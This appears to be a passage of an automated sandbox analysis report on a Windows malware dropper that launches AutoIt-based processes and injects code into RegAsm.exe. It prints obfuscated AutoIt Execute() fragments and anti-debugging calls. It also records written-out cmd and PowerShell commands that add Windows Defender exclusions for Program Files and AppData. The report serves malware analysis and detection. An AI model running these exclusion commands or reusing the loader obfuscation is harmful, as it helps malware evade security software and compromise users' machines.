              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A79E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A79E43
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A79F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00A79F9E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060E334 GetFileAttributesW,FindFirstFileW,FindClose,13_2_0060E334
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0061A32C FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_0061A32C
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_006165AE FindFirstFileW,FindNextFileW,FindClose,13_2_006165AE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00617205 FindFirstFileW,FindClose,13_2_00617205
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_006172A6 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,13_2_006172A6
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060D7CC FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0060D7CC
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_0060DB0B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_0060DB0B
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00619E43 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00619E43
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_00619F9E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00619F9E
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C329A4 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,7_2_00C329A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: Rifiutare.exe.com, 00000009.00000003.2080178808.00000000017A1000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2066204373.000000000176C000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2078740442.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2108145471.00000000017A4000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2078343537.000000000177B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $onfUMGmxQemUHQjZU = Execute(OOAetW("92@125@123@114@119@112@82@124@79@117@120@106@125@49@48@122@118@118@97@91@114@96@106@75@86@128@125@130@48@50",9)), $QMVffPjGxd = 'RtXzUsmCVFuVFOnCruAxlqKRFUeDBGxypgZr''
              Source: Rifiutare.exe.com, 00000007.00000003.1727247813.00000000019E3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1728953201.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726637724.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727869205.00000000019E4000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1729287097.0000000001A2A000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727105640.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000002.1745121304.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1729378280.0000000001A39000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726909397.00000000019BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $onfUMGmxQemUHQjZU = OOAetW("126@86@120@83@91@108@89@118@73@78@83@81@91@93@96@114@125@95@74@118@82@77@86@110@79@105@93@107@115",8)\D[T5
              Source: Uno.exe.com, 0000000A.00000003.1731584452.0000000003C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LQVMCIXMPTQSLOMn
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682726705.0000000005580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: $LqVmcIxMPtqsLO = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<80<79<114<114<118<121<106<71<126<111<117<107<91<76<45<47",6)), $xGnOWIHpkULClD = 'gsMCXDvYihOKzDTJlJhdnjEAdwnYdnOyWmSQdaIaXHdBo'
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.00000000047BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $onfUMGmxQemUHQjZU = OOAetW("126@86@120@83@91@108@89@118@73@78@83@81@91@93@96@114@125@95@74@118@82@77@86@110@79@105@93@107@115",8)
              Source: Uno.exe.com, 0000000A.00000003.1732013022.0000000003C11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pqEmUdpmugyRUJgqxIfoAqBUwQRUEoWibCiqAST,
              Source: Uno.exe.com, 0000000A.00000003.1728146711.0000000001561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $LqVmcIxMPtqsLO = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<80<79<114<114<118<121<106<71<126<111<117<107<91<76<45<47",6)), $xGnOWIHpkULClD = 'gsMCXDvYihOKzDTJlJhdnjEAdwnYdnOyWmSQdaIaXHdBo'-
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682612254.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682726705.0000000005580000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Local $znDtzmHMtQTFUckMy = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<122<103<84<91<79<122<122<83<45<47",6)), $JSnAAEyLS = 'pqEmUdpmugyRUJgqxIfoAqBUwQRUEoWibCiqAST'
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682612254.00000000053C0000.00000004.00001000.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, 8lOT1rXZp5.exe, 00000000.00000003.1682726705.0000000005580000.00000004.00001000.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1729353789.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727581715.0000000001510000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1726357264.000000000150B000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1707738151.000000000136E000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728909657.00000000015A1000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727795963.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728060241.0000000001538000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727886798.0000000001522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $cxuhHyZUilXSovF = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<121<126<119<107<91<115<127<82<96<45<47",6)), $eqrnjYHYCAokVO = 'RNbbzuLAPDlgemDREVoKGXekilxmQwymkpeLHgFSdmhU'
              Source: Uno.exe.com, 0000000A.00000003.1727581715.0000000001510000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1726357264.000000000150B000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727795963.000000000151A000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728415861.0000000001539000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1728060241.0000000001538000.00000004.00000020.00020000.00000000.sdmp, Uno.exe.com, 0000000A.00000003.1727886798.0000000001522000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $znDtzmHMtQTFUckMy = Execute(urjDlX("89<122<120<111<116<109<79<121<76<114<117<103<122<46<45<122<103<84<91<79<122<122<83<45<47",6)), $JSnAAEyLS = 'pqEmUdpmugyRUJgqxIfoAqBUwQRUEoWibCiqAST'QHuZr'
              Source: Rifiutare.exe.com, 00000009.00000003.2078703692.0000000004626000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000002.2170535766.0000000004629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: Uno.exe.com, 0000000A.00000003.1736543737.0000000003769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LGZWBMLBQZFNNQBQNHHOKGRLOERIQEMUSBBFCFOVTTURCEEKXP:
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.00000000047BB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727247813.00000000019E3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1728953201.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726637724.00000000019A3000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1729351877.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727869205.00000000019E4000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1727105640.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000007.00000003.1726909397.00000000019BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $onfUMGmxQemUHQjZU = Execute(OOAetW("92@125@123@114@119@112@82@124@79@117@120@106@125@49@48@122@118@118@97@91@114@96@106@75@86@128@125@130@48@50",9)), $QMVffPjGxd = 'RtXzUsmCVFuVFOnCruAxlqKRFUeDBGxypgZr'
              Source: Uno.exe.com, 0000000A.00000003.1734150509.00000000015DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $DalkFKFhtOUfCJjww = 'ugxTLmqXroWvmcIcgEzWOpvryQvIDtACTgRaEKHLlIGvdHfnHix'
              Source: Uno.exe.com, 0000000A.00000003.1729767565.00000000015CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6<109<79<121<76<114<117<103<122<46<45<121<126<119<107<91<115<127<82<96<45<47",6)), $eqrnjYHYCAokVO = 'RNbbzuLAPDlgemDREVoKGXekilxmQwymkpeLHgFSdmhU'
              Source: Rifiutare.exe.com, 00000009.00000003.2119554561.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2135882118.00000000017CE000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000002.2167852420.00000000017D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $onfUMGmxQemUHQjZU = OOAetW("126@86@120@83@91@108@89@118@73@78@83@81@91@93@96@114@125@95@74@118@82@77@86@110@79@105@93@107@115",8)\Dq
              Source: Uno.exe.com, 0000000A.00000003.1730853339.0000000003D3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ugxTLmqXroWvmcIcgEzWOpvryQvIDtACTgRaEKHLlIGvdHfnHixyNN
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: For $AusByNcdrBaKaXOrfBLLBAhonIOZgYrpnorXkwrqEmUzKlfZYYKakXbZSo = 10 To 36
              Source: Rifiutare.exe.com, 00000007.00000003.1731289967.0000000004441000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ONFUMGMXQEMUHQJZU2
              Source: Uno.exe.com, 0000000A.00000003.1731584452.0000000003C69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: LQVMCIXMPTQSLO
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $cYgndbEVcfcQHE = 'xziTKFkvRIloSCqemUsVVdxoIrLNJvzUmkZDnlsIpCvQugL'
              Source: Uno.exe.com, 0000000A.00000003.1729458959.0000000003E9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RNbbzuLAPDlgemDREVoKGXekilxmQwymkpeLHgFSdmhU^_
              Source: 8lOT1rXZp5.exe, 00000000.00000003.1682764178.0000000004BDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: For $lGZwBmlBqZFnnqBqNhHOkgrLoeRIQEMUSBbFCFoVtturCEEKxP = 5 To 34
              Source: Rifiutare.exe.com, 00000007.00000003.1731289967.0000000004441000.00000004.00000020.00020000.00000000.sdmp, Rifiutare.exe.com, 00000009.00000003.2137667428.0000000004471000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ONFUMGMXQEMUHQJZU
              Source: Rifiutare.exe.com, 00000009.00000003.2137667428.0000000004471000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ONFUMGMXQEMUHQJZU[8\
              Source: Uno.exe.com, 0000000A.00000003.1728146711.0000000001561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $LqVmcIxMPtqsLO = Execute(urjDlX("72<118<109<122<105<75<105<120<87<105<118<109<101<112<44<43<70<118<85<88<93<107<80<107<77<88<86<43<45",4)), $qRuxVfhfy = 'QmLxpjFqHbVBYoDeaDWCxqNR'
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00CAF2E8 BlockInput,7_2_00CAF2E8
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C3331E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,7_2_00C3331E
              Source: C:\Users\user\Desktop\8lOT1rXZp5.exeCode function: 0_2_00407F31 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,GetDlgItem,GetWindow,0_2_00407F31
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C55108 mov eax, dword ptr fs:[00000030h]7_2_00C55108
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A25108 mov eax, dword ptr fs:[00000030h]10_2_00A25108
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C5108 mov eax, dword ptr fs:[00000030h]13_2_005C5108
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C920EE WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,7_2_00C920EE
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C629B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00C629B2
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C50C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00C50C5F
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C50DF5 SetUnhandledExceptionFilter,7_2_00C50DF5
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comCode function: 7_2_00C51041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00C51041
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A329B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A329B2
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A20C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00A20C5F
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A20DF5 SetUnhandledExceptionFilter,10_2_00A20DF5
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comCode function: 10_2_00A21041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00A21041
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005D29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_005D29B2
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C0C5F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_005C0C5F
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C0DF5 SetUnhandledExceptionFilter,13_2_005C0DF5
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.comCode function: 13_2_005C1041 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_005C1041
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.199.111.133 443
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Rifiutare.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: 580000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.comMemory written: C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe base: D00000 value starts with: 4D5AJump to behavior
